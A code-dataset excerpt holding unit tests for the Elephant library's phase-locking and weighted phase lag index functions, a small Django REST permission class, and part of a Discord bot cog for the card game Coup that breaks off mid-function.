np.testing.assert_allclose(list3_plv_t, target_plv_is_zero,\n                                   rtol=1e-2, atol=1.1e-1)\n\n    def testPhaseLockingValue_raise_Error_if_trial_number_is_different(self):\n        \"\"\"\n        Test if a ValueError is raised, when the signals have different\n        numbers of trials.\n        \"\"\"\n        # different numbers of trials\n        np.testing.assert_raises(\n            ValueError, elephant.phase_analysis.phase_locking_value,\n            self.simple_x, self.simple_y)\n\n    def testPhaseLockingValue_raise_Error_if_trial_lengths_are_different(self):\n        \"\"\"\n        Test if a ValueError is raised, when within a trial pair of the signals\n        the trial lengths are different.\n        \"\"\"\n        # different lengths in a trial pair\n        np.testing.assert_raises(\n            ValueError, elephant.phase_analysis.phase_locking_value,\n            self.simple_y, self.simple_z)\n\n\nclass WeightedPhaseLagIndexTestCase(unittest.TestCase):\n    files_to_download_ground_truth = None\n    files_to_download_artificial = None\n    files_to_download_real = None\n\n    @classmethod\n    def setUpClass(cls):\n        np.random.seed(73)\n\n        # The files from G-Node GIN 'elephant-data' repository will be\n        # downloaded once into a local temporary directory\n        # and then loaded/read for each test function individually.\n\n        # REAL DATA\n        real_data_path = \"unittest/phase_analysis/weighted_phase_lag_index/\" \\\n                         \"data/wpli_real_data\"\n        cls.files_to_download_real = (\n            (\"i140703-001_ch01_slice_TS_ON_to_GO_ON_correct_trials.mat\",\n             \"0e76454c58208cab710e672d04de5168\"),\n            (\"i140703-001_ch02_slice_TS_ON_to_GO_ON_correct_trials.mat\",\n             \"b06059e5222e91eb640caad0aba15b7f\"),\n            (\"i140703-001_cross_spectrum_of_channel_1_and_2_of_slice_\"\n             \"TS_ON_to_GO_ON_corect_trials.mat\",\n             \"2687ef63a4a456971a5dcc621b02e9a9\")\n        )\n        for filename, checksum in cls.files_to_download_real:\n            # files will be downloaded to ELEPHANT_TMP_DIR\n            cls.tmp_path = download_datasets(\n                f\"{real_data_path}/{filename}\", checksum=checksum)\n        # ARTIFICIAL DATA\n        artificial_data_path = \"unittest/phase_analysis/\" \\\n            \"weighted_phase_lag_index/data/wpli_specific_artificial_dataset\"\n        cls.files_to_download_artificial = (\n            (\"artificial_LFPs_1.mat\", \"4b99b15f89c0b9a0eb6fc14e9009436f\"),\n            (\"artificial_LFPs_2.mat\", \"7144976b5f871fa62f4a831f530deee4\"),\n        )\n        for filename, checksum in cls.files_to_download_artificial:\n            # files will be downloaded to ELEPHANT_TMP_DIR\n            cls.tmp_path = download_datasets(\n                f\"{artificial_data_path}/{filename}\", checksum=checksum)\n        # GROUND TRUTH DATA\n        ground_truth_data_path = \"unittest/phase_analysis/\" \\\n            \"weighted_phase_lag_index/data/wpli_ground_truth\"\n        cls.files_to_download_ground_truth = (\n            
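# [Editor's note] An illustrative sketch of the quantity exercised by the
# PhaseLockingValueTestCase above: at each time point the PLV is the length of
# the trial-averaged unit vector of the phase differences. This assumes the
# same (n_trials, n_time_points) shape convention as the tests; it is not
# Elephant's implementation.
import numpy as np

def naive_plv(x_phases, y_phases):
    if x_phases.shape != y_phases.shape:
        raise ValueError("signals must share the same (trials, time) shape")
    return np.abs(np.mean(np.exp(1j * (x_phases - y_phases)), axis=0))

rng = np.random.default_rng(0)
x = rng.uniform(-np.pi, np.pi, (100, 1000))
assert np.allclose(naive_plv(x, x), 1)  # identical trials -> PLV == 1 everywhere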
(\"ground_truth_WPLI_from_ft_connectivity_wpli_\"\n \"with_real_LFPs_R2G.csv\", \"4d9a7b7afab7d107023956077ab11fef\"),\n (\"ground_truth_WPLI_from_ft_connectivity_wpli_\"\n \"with_artificial_LFPs.csv\", \"92988f475333d7badbe06b3f23abe494\"),\n )\n for filename, checksum in cls.files_to_download_ground_truth:\n # files will be downloaded into ELEPHANT_TMP_DIR\n cls.tmp_path = download_datasets(\n f\"{ground_truth_data_path}/{filename}\", checksum=checksum)\n\n def setUp(self):\n self.tolerance = 1e-15\n\n # load real/artificial LFP-dataset for ground-truth consistency checks\n # real LFP-dataset\n dataset1_real = scipy.io.loadmat(\n f\"{self.tmp_path.parent}/{self.files_to_download_real[0][0]}\",\n squeeze_me=True)\n dataset2_real = scipy.io.loadmat(\n f\"{self.tmp_path.parent}/{self.files_to_download_real[1][0]}\",\n squeeze_me=True)\n\n # get relevant values\n self.lfps1_real = dataset1_real['lfp_matrix'] * pq.uV\n self.sf1_real = dataset1_real['sf'] * pq.Hz\n self.lfps2_real = dataset2_real['lfp_matrix'] * pq.uV\n self.sf2_real = dataset2_real['sf'] * pq.Hz\n # create AnalogSignals from the real dataset\n self.lfps1_real_AnalogSignal = AnalogSignal(\n signal=self.lfps1_real, sampling_rate=self.sf1_real)\n self.lfps2_real_AnalogSignal = AnalogSignal(\n signal=self.lfps2_real, sampling_rate=self.sf2_real)\n\n # artificial LFP-dataset\n dataset1_artificial = scipy.io.loadmat(\n f\"{self.tmp_path.parent}/\"\n f\"{self.files_to_download_artificial[0][0]}\", squeeze_me=True)\n dataset2_artificial = scipy.io.loadmat(\n f\"{self.tmp_path.parent}/\"\n f\"{self.files_to_download_artificial[1][0]}\", squeeze_me=True)\n # get relevant values\n self.lfps1_artificial = dataset1_artificial['lfp_matrix'] * pq.uV\n self.sf1_artificial = dataset1_artificial['sf'] * pq.Hz\n self.lfps2_artificial = dataset2_artificial['lfp_matrix'] * pq.uV\n self.sf2_artificial = dataset2_artificial['sf'] * pq.Hz\n # create AnalogSignals from the artificial dataset\n self.lfps1_artificial_AnalogSignal = AnalogSignal(\n signal=self.lfps1_artificial, sampling_rate=self.sf1_artificial)\n self.lfps2_artificial_AnalogSignal = AnalogSignal(\n signal=self.lfps2_artificial, sampling_rate=self.sf2_artificial)\n\n # load ground-truth reference calculated by:\n # Matlab package 'FieldTrip': ft_connectivity_wpli()\n self.wpli_ground_truth_ft_connectivity_wpli_real = np.loadtxt(\n f\"{self.tmp_path.parent}/\"\n f\"{self.files_to_download_ground_truth[0][0]}\",\n delimiter=',', dtype=np.float64)\n self.wpli_ground_truth_ft_connectivity_artificial = np.loadtxt(\n f\"{self.tmp_path.parent}/\"\n f\"{self.files_to_download_ground_truth[1][0]}\",\n delimiter=',', dtype=np.float64)\n\n def test_WPLI_ground_truth_consistency_real_LFP_dataset(self):\n \"\"\"\n Test if the WPLI is consistent with the reference implementation\n ft_connectivity_wpli() of the MATLAB-package FieldTrip using\n LFP-dataset cuttings from the multielectrode-grasp G-Node GIN\n repository, which can be found here:\n https://doi.gin.g-node.org/10.12751/g-node.f83565/\n The cutting was performed with this python-script:\n multielectrode_grasp_i140703-001_cutting_script_TS_ON_to_GO_ON.py\n which is available on https://gin.g-node.org/INM-6/elephant-data\n in folder validation/phase_analysis/weighted_phase_lag_index/scripts,\n where also the MATLAB-script for ground-truth generation is located.\n \"\"\"\n # Quantity-input\n with self.subTest(msg=\"Quantity input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_real, self.lfps2_real, 
self.sf1_real)\n np.testing.assert_allclose(\n wpli, self.wpli_ground_truth_ft_connectivity_wpli_real,\n equal_nan=True)\n # np.array-input\n with self.subTest(msg=\"np.array input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_real.magnitude, self.lfps2_real.magnitude,\n self.sf1_real)\n np.testing.assert_allclose(\n wpli, self.wpli_ground_truth_ft_connectivity_wpli_real,\n equal_nan=True)\n # neo.AnalogSignal-input\n with self.subTest(msg=\"neo.AnalogSignal input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_real_AnalogSignal, self.lfps2_real_AnalogSignal)\n np.testing.assert_allclose(\n wpli, self.wpli_ground_truth_ft_connectivity_wpli_real,\n equal_nan=True)\n\n def test_WPLI_ground_truth_consistency_artificial_LFP_dataset(self):\n \"\"\"\n Test if the WPLI is consistent with the ground truth generated with\n multi-sine artificial LFP-datasets.\n The generation was performed with this python-script:\n generate_artificial_datasets_for_ground_truth_of_wpli.py\n which is available on https://gin.g-node.org/INM-6/elephant-data\n in folder validation/phase_analysis/weighted_phase_lag_index/scripts,\n where also the MATLAB-script for ground-truth generation is located.\n \"\"\"\n # Quantity-input\n with self.subTest(msg=\"Quantity input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial, self.lfps2_artificial,\n self.sf1_artificial, absolute_value=False)\n np.testing.assert_allclose(\n wpli, self.wpli_ground_truth_ft_connectivity_artificial,\n atol=1e-14, rtol=1e-12, equal_nan=True)\n # np.array-input\n with self.subTest(msg=\"np.array input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial.magnitude,\n self.lfps2_artificial.magnitude, self.sf1_artificial,\n absolute_value=False)\n np.testing.assert_allclose(\n wpli, self.wpli_ground_truth_ft_connectivity_artificial,\n atol=1e-14, rtol=1e-12, equal_nan=True)\n # neo.AnalogSignal-input\n with self.subTest(msg=\"neo.AnalogSignal input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial_AnalogSignal,\n self.lfps2_artificial_AnalogSignal, absolute_value=False)\n np.testing.assert_allclose(\n wpli, self.wpli_ground_truth_ft_connectivity_artificial,\n atol=1e-14, rtol=1e-12, equal_nan=True)\n\n def test_WPLI_is_zero(self):\n \"\"\"\n Test if WPLI is close to zero at frequency f=70Hz for the multi-sine\n artificial LFP dataset. 
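# [Editor's note] For reference, the weighted phase lag index checked against
# FieldTrip above is defined from the trial-wise cross-spectrum X(f) of the
# two signals: WPLI(f) = |E[Im(X)]| / E[|Im(X)|]. A minimal sketch of that
# formula, assuming `cross_spec` has shape (n_trials, n_freqs); dropping the
# outer abs gives the signed variant the tests request with
# absolute_value=False. This mirrors the definition only, not Elephant's
# estimator (which also handles spectral estimation and units).
import numpy as np

def naive_wpli(cross_spec, absolute_value=True):
    im = np.imag(cross_spec)
    signed = np.mean(im, axis=0) / np.mean(np.abs(im), axis=0)
    return np.abs(signed) if absolute_value else signed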
White noise prevents arbitrary approximation.\n \"\"\"\n # Quantity-input\n with self.subTest(msg=\"Quantity input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial, self.lfps2_artificial,\n self.sf1_artificial, absolute_value=False)\n np.testing.assert_allclose(\n wpli[freq == 70], 0, atol=0.004, rtol=self.tolerance)\n # np.array-input\n with self.subTest(msg=\"np.array input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial.magnitude,\n self.lfps2_artificial.magnitude, self.sf1_artificial,\n absolute_value=False)\n np.testing.assert_allclose(\n wpli[freq == 70], 0, atol=0.004, rtol=self.tolerance)\n # neo.AnalogSignal-input\n with self.subTest(msg=\"neo.AnalogSignal input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial_AnalogSignal,\n self.lfps2_artificial_AnalogSignal, absolute_value=False)\n np.testing.assert_allclose(\n wpli[freq == 70], 0, atol=0.004, rtol=self.tolerance)\n\n def test_WPLI_is_one(self):\n \"\"\"\n Test if WPLI is one at frequency f=16Hz and 36Hz for the multi-sine\n artificial LFP dataset.\n \"\"\"\n # Quantity-input\n with self.subTest(msg=\"Quantity input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial, self.lfps2_artificial,\n self.sf1_artificial, absolute_value=False)\n mask = ((freq == 16) | (freq == 36))\n np.testing.assert_allclose(\n wpli[mask], 1, atol=self.tolerance, rtol=self.tolerance)\n # np.array-input\n with self.subTest(msg=\"np.array input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial.magnitude,\n self.lfps2_artificial.magnitude, self.sf1_artificial,\n absolute_value=False)\n mask = ((freq == 16) | (freq == 36))\n np.testing.assert_allclose(\n wpli[mask], 1, atol=self.tolerance, rtol=self.tolerance)\n # neo.AnalogSignal-input\n with self.subTest(msg=\"neo.AnalogSignal input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial_AnalogSignal,\n self.lfps2_artificial_AnalogSignal, absolute_value=False)\n mask = ((freq == 16) | (freq == 36))\n np.testing.assert_allclose(\n wpli[mask], 1, atol=self.tolerance, rtol=self.tolerance)\n\n def test_WPLI_is_minus_one(self):\n \"\"\"\n Test if WPLI is minus one at frequency f=52Hz and 100Hz\n for the multi-sine artificial LFP dataset.\n \"\"\"\n # Quantity-input\n with self.subTest(msg=\"Quantity input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial, self.lfps2_artificial,\n self.sf1_artificial, absolute_value=False)\n mask = ((freq == 52) | (freq == 100))\n np.testing.assert_allclose(\n wpli[mask], -1, atol=self.tolerance, rtol=self.tolerance)\n # np.array-input\n with self.subTest(msg=\"np.array input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial.magnitude,\n self.lfps2_artificial.magnitude, self.sf1_artificial,\n absolute_value=False)\n np.testing.assert_allclose(\n wpli[mask], -1, atol=self.tolerance, rtol=self.tolerance)\n # neo.AnalogSignal-input\n with self.subTest(msg=\"neo.AnalogSignal input\"):\n freq, wpli = elephant.phase_analysis.weighted_phase_lag_index(\n self.lfps1_artificial_AnalogSignal,\n self.lfps2_artificial_AnalogSignal, absolute_value=False)\n np.testing.assert_allclose(\n wpli[mask], -1, atol=self.tolerance, rtol=self.tolerance)\n\n def test_WPLI_raises_error_if_signals_have_different_shapes(self):\n \"\"\"\n Test if WPLI raises a ValueError, 
when the signals have different\n        numbers of trials or different trial lengths.\n        \"\"\"\n        # simple samples of different shapes to check error raising\n        trials2_length3 = np.array([[0, -1, 1], [0, -1, 1]]) * pq.uV\n        trials1_length3 = np.array([[0, -1, 1]]) * pq.uV\n        trials1_length4 = np.array([[0, 1, 1 / 2, -1]]) * pq.uV\n        sampling_frequency = 250 * pq.Hz\n        trials2_length3_analogsignal = AnalogSignal(\n            signal=trials2_length3, sampling_rate=sampling_frequency)\n        trials1_length3_analogsignal = AnalogSignal(\n            signal=trials1_length3, sampling_rate=sampling_frequency)\n        trials1_length4_analogsignal = AnalogSignal(\n            signal=trials1_length4, sampling_rate=sampling_frequency)\n\n        # different numbers of trials\n        with self.subTest(msg=\"diff. trial numbers & Quantity input\"):\n            np.testing.assert_raises(\n                ValueError, elephant.phase_analysis.weighted_phase_lag_index,\n                trials2_length3, trials1_length3, sampling_frequency)\n        with self.subTest(msg=\"diff. trial numbers & np.array input\"):\n            np.testing.assert_raises(\n                ValueError, elephant.phase_analysis.weighted_phase_lag_index,\n                trials2_length3.magnitude, trials1_length3.magnitude,\n                sampling_frequency)\n        with self.subTest(msg=\"diff. trial numbers & neo.AnalogSignal input\"):\n            np.testing.assert_raises(\n                ValueError, elephant.phase_analysis.weighted_phase_lag_index,\n                trials2_length3_analogsignal, trials1_length3_analogsignal)\n        # different lengths in a trial pair\n        with self.subTest(msg=\"diff. trial lengths & Quantity input\"):\n            np.testing.assert_raises(\n                ValueError, elephant.phase_analysis.weighted_phase_lag_index,\n                trials1_length3, trials1_length4, sampling_frequency)\n        with self.subTest(msg=\"diff. trial lengths & np.array input\"):\n            np.testing.assert_raises(\n                ValueError, elephant.phase_analysis.weighted_phase_lag_index,\n                trials1_length3.magnitude, trials1_length4.magnitude,\n                sampling_frequency)\n        with self.subTest(msg=\"diff. 
trial lengths & neo.AnalogSignal input\"):\n np.testing.assert_raises(\n ValueError, elephant.phase_analysis.weighted_phase_lag_index,\n trials1_length3_analogsignal, trials1_length4_analogsignal)\n\n @staticmethod\n def test_WPLI_raises_error_if_AnalogSignals_have_diff_sampling_rate():\n \"\"\"\n Test if WPLI raises a ValueError, when the AnalogSignals have different\n sampling rates.\n \"\"\"\n signal_x_250_hz = AnalogSignal(signal=np.random.random([40, 2100]),\n units=pq.mV, sampling_rate=0.25*pq.kHz)\n signal_y_1000_hz = AnalogSignal(signal=np.random.random([40, 2100]),\n units=pq.mV, sampling_rate=1000*pq.Hz)\n np.testing.assert_raises(\n ValueError, elephant.phase_analysis.weighted_phase_lag_index,\n signal_x_250_hz, signal_y_1000_hz)\n\n def test_WPLI_raises_error_if_sampling_rate_not_given(self):\n \"\"\"\n Test if WPLI raises a ValueError, when the sampling rate is not given\n for np.array() or Quanitity input.\n \"\"\"\n signal_x = np.random.random([40, 2100]) * pq.mV\n signal_y = np.random.random([40, 2100]) * pq.mV\n with self.subTest(msg=\"Quantity-input\"):\n np.testing.assert_raises(\n ValueError, elephant.phase_analysis.weighted_phase_lag_index,\n signal_x, signal_y)\n with self.subTest(msg=\"np.array-input\"):\n np.testing.assert_raises(\n ValueError, elephant.phase_analysis.weighted_phase_lag_index,\n signal_x.magnitude, signal_y.magnitude)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"NeuralEnsemble/elephant","sub_path":"elephant/test/test_phase_analysis.py","file_name":"test_phase_analysis.py","file_ext":"py","file_size_in_byte":33242,"program_lang":"python","lang":"en","doc_type":"code","stars":168,"dataset":"github-code","pt":"78"} +{"seq_id":"17796321061","text":"from rest_framework import permissions\n\n\nclass IsUserorReadOnly(permissions.BasePermission):\n \"\"\"\n custom permission to only allow creator of organization to mak change in organization information\n \"\"\"\n\n def user_status_ckecker(self, request, view, obj):\n if request.user.is_anonymous:\n return False\n if obj.user == request.user:\n return True\n return False\n","repo_name":"hadi-aa/Final","sub_path":"analyse/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3536378205","text":"'''\nFile: game_cog.py\nAuthor: Gavin Vogt\nThis program creates the Game cog for the Coup Bot\n'''\n\n# dependencies\nfrom discord import User, Embed, Color\nfrom discord.ext import commands\nimport asyncio\n\n# my code\nfrom cogs.base_cog import BaseCog\nfrom classes.coup_game import CoupGame\nfrom classes import actions, responses\nfrom helpers.command_checks import (channel_has_game, game_is_started, is_stage,\n game_not_started, is_player, is_turn,others_in_game, has_enough_coins,\n under_ten_coins, is_game_master, must_swap, must_kill, is_exchange,\n exchange_time_up, not_swapped_yet)\n\n\n# Removing a player during the game\nFORFEIT_HELP = \"Forfeit from a game\"\nKICK_HELP = \"Kick a player from the game\"\n\n# Action commands\nSTEAL_HELP = \"Steal 2 coins from another player (CAPTAIN)\"\nEXCHANGE_HELP = \"Look at two cards in the pile to exchange (AMBASSADOR)\"\nSWAP_HELP = \"Perform the swap in an exchange\"\nNOSWAP_HELP = \"Skipp the swap in an exchange\"\nASSASSINATE_HELP = \"Assassinate another player for 3 coins (ASSASSIN)\"\nTAX_HELP = \"Take tax for +3 coins (DUKE)\"\nINCOME_HELP = \"Take income for +1 coin (GENERAL)\"\nFOREIGNAID_HELP = 
\"Take foreign aid for +2 coins (GENERAL)\"\nCOUP_HELP = \"Launch a coup on another player for 7 coins (GENERAL)\"\n\n# Response commands\nPASS_HELP = \"Pass on responding to another player's action\"\nCHALLENGE_HELP = \"Challenges a player's claim\"\nDIE_HELP = \"Select card(s) to die\"\nBLOCK_HELP = \"\"\"Blocks another player's action\nValid influence types:\n - contessa\n - captain\n - ambassador\n - duke\n - doublecontessa\n\"\"\"\n\n\nclass GameCog(BaseCog, name=\"game\"):\n '''\n Commands for setting up and playing a game of Coup\n '''\n def __init__(self, bot):\n super().__init__(bot)\n\n async def cog_before_invoke(self, ctx):\n game = self.bot.get_game(ctx.channel.id)\n if game is not None:\n print(\"\\nBefore:\", \"-\"*45, game, sep='\\n')\n print(\"-\"*45)\n\n async def cog_after_invoke(self, ctx):\n '''\n After every command in this Cog, it will automatically check\n if the turn / game is over and advance the turn if necessary.\n '''\n game = self.bot.get_game(ctx.channel.id)\n if game is not None:\n print(\"\\nAfter:\", \"-\"*45, game, sep='\\n')\n\n # Check if game / turn is over\n await self._check_turn_over(ctx.channel, game, advance_if_possible=False)\n await self._check_game_over(ctx.channel, game)\n\n le = game.last_event()\n if le is not None:\n print(\"\\nLast event:\", le)\n print(\"Wins challenge:\", le.wins_challenge())\n print(\"-\"*45)\n\n\n ################################### ACTION COMMANDS ################################\n\n @commands.command(name=\"steal\", help=STEAL_HELP, aliases=['captain'])\n @others_in_game(1, \"steal from\")\n @under_ten_coins()\n @has_enough_coins(actions.Steal.cost())\n @is_turn()\n @is_player()\n @game_is_started()\n @channel_has_game()\n @commands.guild_only()\n async def steal_from_player(self, ctx, user: User):\n '''\n Steals from another player\n user: discord.User of player to steal from\n '''\n # Get the game and other player\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n other_player = game.get_player(user.id)\n\n # Create and perform the Action\n game.action = actions.Steal(player, other_player)\n game.action.perform_action()\n await ctx.send(game.action.attempt_message())\n await user.send(embed=game.action.available_responses(ctx.channel.mention))\n\n @steal_from_player.before_invoke\n async def before_steal_from_player(self, ctx):\n '''\n Before a steal, it checks that the player has at least 1 coin\n and rotates the turn if necessary\n '''\n game = self.bot.get_game(ctx.channel.id)\n user = ctx.message.mentions[0]\n stealing_from = game.get_player(user.id)\n if stealing_from.get_coins() < 1:\n # user doesn't have enough coins to steal from\n await ctx.send(f\"{user.mention} is too broke to steal from\")\n raise commands.CheckFailure(f\"{user.mention} is too broke to steal from\")\n await self.pre_action_check(ctx)\n\n @commands.command(name=\"exchange\", help=EXCHANGE_HELP, aliases=['ambassador'])\n @under_ten_coins()\n @has_enough_coins(actions.Exchange.cost())\n @is_turn()\n @is_player()\n @game_is_started()\n @channel_has_game()\n @commands.guild_only()\n async def exchange_cards(self, ctx):\n '''\n Lets the user view the top two cards in the pile and\n swap up to one of their own cards with one from the pile\n '''\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n\n # Create and perform the Action\n exchange = actions.Exchange(player)\n game.action = exchange\n exchange.perform_action()\n await ctx.send(exchange.attempt_message())\n\n # Wait 
for someone to challenge before continuing\n wait_time = actions.Exchange.get_wait_time()\n wait_embed = Embed(\n title = \"Waiting for challenges ...\",\n description = f\"{wait_time} seconds remaining\",\n color = Color.orange(),\n )\n msg = await ctx.send(embed=wait_embed)\n exchange.set_time_up(False)\n await asyncio.sleep(1)\n for i in range(wait_time - 1, 0, -1):\n if game.challenge1 is not None:\n # challenge occurred; continue and see if won\n exchange.set_time_up(True)\n break\n wait_embed.description = f\"{i} seconds remaining\"\n await msg.edit(embed=wait_embed)\n await asyncio.sleep(1)\n\n # Wait is over\n exchange.set_time_up(True)\n if game.challenge1 is not None and not exchange.wins_challenge():\n # Exchange failed\n wait_embed.description = \"CANCELLED\"\n wait_embed.color = Color.red()\n await msg.edit(embed=wait_embed)\n await ctx.send(\"Exchange cancelled\")\n else:\n # Carry out the exchange\n wait_embed.description = \"SUCCESS\"\n wait_embed.color = Color.green()\n await msg.edit(embed=wait_embed)\n await ctx.send(f\"Showing {exchange.done_by.get_mention()} top 2 cards\")\n\n # Draw the top two cards\n exchange.set_card(0, game.draw_card())\n exchange.set_card(1, game.draw_card())\n card_embed = Embed(\n title = \"Top Two Cards\",\n description = \"Use `c!hand` if you need to see your hand.\\nSelect a card to swap with:\",\n color = Color.green(),\n )\n card_embed.set_footer(text=\"c!swap \\nc!noswap\")\n card_embed.add_field(name=\"Card 1\", value=exchange.get_card(0).capitalize())\n card_embed.add_field(name=\"Card 2\", value=exchange.get_card(1).capitalize())\n\n await exchange.done_by.get_user().send(embed=card_embed)\n\n @commands.command(name=\"swap\", help=SWAP_HELP)\n @exchange_time_up(True)\n @not_swapped_yet()\n @is_exchange()\n @must_swap()\n @is_player()\n @game_is_started()\n @channel_has_game()\n @commands.guild_only()\n async def perform_card_swap(self, ctx, your_card: int, swap_with: int):\n '''\n Lets the user perform a card swap to finish the Exchange\n your_card: index of player's card to swap\n swap_with: index of exchange card to swap with\n '''\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n\n # Verify that the indices are valid\n your_card -= 1\n swap_with -= 1\n if not (0 <= your_card < game.influences_per_player()):\n await ctx.send(f\"Invalid index: `your_card={your_card + 1}`\")\n return\n if not player[your_card].alive:\n await ctx.send(f\"Your card `{your_card + 1}` is not alive\")\n return\n if not (0 <= swap_with <= 1):\n await ctx.send(f\"Invalid index: `swap_with={swap_with + 1}`\")\n return\n\n # Perform the swap\n await player.get_user().send(f\"Swapped your `{player[your_card].type.capitalize()}`, for `{game.action.get_card(swap_with).capitalize()}`\")\n game.action.perform_swap(your_card, swap_with, game)\n player.must_swap = False\n await ctx.send(\"Performed swap and shuffled draw pile\")\n\n await self._check_turn_over(ctx.channel, game, advance_if_possible=True)\n\n @commands.command(name=\"noswap\", help=NOSWAP_HELP)\n @exchange_time_up(True)\n @not_swapped_yet()\n @is_exchange()\n @must_swap()\n @is_player()\n @game_is_started()\n @channel_has_game()\n @commands.guild_only()\n async def no_card_swap(self, ctx):\n '''\n Lets the user decide not to swap cards\n '''\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n\n game.action.perform_swap(None, 0, game)\n player.must_swap = False\n await ctx.send(\"Skipped swap and shuffled draw pile\")\n\n await 
self._check_turn_over(ctx.channel, game, advance_if_possible=True)\n\n @commands.command(name=\"assassinate\", help=ASSASSINATE_HELP, aliases=['assassin'])\n @others_in_game(1, \"assassinate\")\n @under_ten_coins()\n @has_enough_coins(actions.Assassinate.cost())\n @is_turn()\n @is_player()\n @game_is_started()\n @channel_has_game()\n @commands.guild_only()\n async def assassinate_player(self, ctx, user: User):\n '''\n Assassinates another player\n user: discord.User of player to assassinate\n '''\n # Get the game and other player\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n other_player = game.get_player(user.id)\n\n # Create and perform the Action\n game.action = actions.Assassinate(player, other_player)\n game.action.perform_action()\n await ctx.send(game.action.attempt_message())\n await user.send(embed=game.action.available_responses(ctx.channel.mention))\n\n @commands.command(name=\"tax\", help=TAX_HELP, aliases=['duke'])\n @under_ten_coins()\n @has_enough_coins(actions.Tax.cost())\n @is_turn()\n @is_player()\n @game_is_started()\n @channel_has_game()\n @commands.guild_only()\n async def take_tax(self, ctx):\n '''\n Lets a duke take tax\n '''\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n\n # Create and perform the Action\n game.action = actions.Tax(player)\n game.action.perform_action()\n await ctx.send(game.action.attempt_message())\n\n @commands.command(name=\"income\", help=INCOME_HELP)\n @under_ten_coins()\n @has_enough_coins(actions.Income.cost())\n @is_turn()\n @is_player()\n @game_is_started()\n @channel_has_game()\n @commands.guild_only()\n async def take_income(self, ctx):\n '''\n Lets a player take income\n '''\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n\n # Create and perform the Action\n game.action = actions.Income(player)\n game.action.perform_action()\n await ctx.send(game.action.attempt_message())\n\n @commands.command(name=\"foreignaid\", help=FOREIGNAID_HELP)\n @under_ten_coins()\n @has_enough_coins(actions.ForeignAid.cost())\n @is_turn()\n @is_player()\n @game_is_started()\n @channel_has_game()\n @commands.guild_only()\n async def take_foreign_aid(self, ctx):\n '''\n Lets a player take foreign aid\n '''\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n\n # Create and perform the Action\n game.action = actions.ForeignAid(player)\n game.action.perform_action()\n await ctx.send(game.action.attempt_message())\n await ctx.send(embed=game.action.available_responses(ctx.channel.mention))\n\n @commands.command(name=\"coup\", help=COUP_HELP)\n @others_in_game(1, \"coup\")\n @has_enough_coins(actions.LaunchCoup.cost())\n @is_turn()\n @is_player()\n @game_is_started()\n @channel_has_game()\n @commands.guild_only()\n async def do_coup(self, ctx, user: User):\n '''\n Lets a player coup another player\n user: discord.User of player to coup\n '''\n # Get the game and other player\n game = self.bot.get_game(ctx.channel.id)\n player = game.get_player(ctx.author.id)\n other_player = game.get_player(user.id)\n\n # Create and perform the Action\n game.action = actions.LaunchCoup(player, other_player)\n game.action.perform_action()\n await ctx.send(game.action.attempt_message())\n await user.send(embed=game.action.available_responses(ctx.channel.mention))\n\n # CHECK BEFORE EACH ACTION IF THE TURN / GAME IS OVER\n # (steal not included because it has a more specific check above)\n @exchange_cards.before_invoke\n async def 
pre_exchange_check(self, ctx):\n        await self.pre_action_check(ctx)\n    @take_tax.before_invoke\n    async def pre_tax_check(self, ctx):\n        await self.pre_action_check(ctx)\n    @assassinate_player.before_invoke\n    async def pre_assassination_check(self, ctx):\n        await self.pre_action_check(ctx)\n    @take_income.before_invoke\n    async def pre_income_check(self, ctx):\n        await self.pre_action_check(ctx)\n    @take_foreign_aid.before_invoke\n    async def pre_foreign_aid_check(self, ctx):\n        await self.pre_action_check(ctx)\n    @do_coup.before_invoke\n    async def pre_coup_check(self, ctx):\n        await self.pre_action_check(ctx)\n\n    async def pre_action_check(self, ctx):\n        '''\n        Before every ACTION command in this Cog, this automatically wraps up\n        the previous turn and rotates to the new turn if necessary.\n        '''\n        # Make sure the game properly rotates the turn\n        game = self.bot.get_game(ctx.channel.id)\n        player = game.get_player(ctx.author.id)\n        await self._check_turn_rotation(ctx.channel, game, player)\n\n    ################################## RESPONSE COMMANDS ###############################\n\n    @commands.command(name=\"block\", help=BLOCK_HELP)\n    @commands.check_any(is_stage(CoupGame.CHALLENGE1_STAGE), is_stage(CoupGame.RESPONSE_STAGE))\n    @game_is_started()\n    @is_player()\n    @channel_has_game()\n    @commands.guild_only()\n    async def block_action(self, ctx, influence=\"auto-determine\"):\n        '''\n        Blocks another player's action from this turn\n        influence: str, representing which influence the player is using to block\n        '''\n        # Get the players involved in the Response\n        game = self.bot.get_game(ctx.channel.id)\n        player = game.get_player(ctx.author.id)\n        player_to_block = game.action.done_by\n\n        # Check if player is allowed to block player_to_block\n        if not 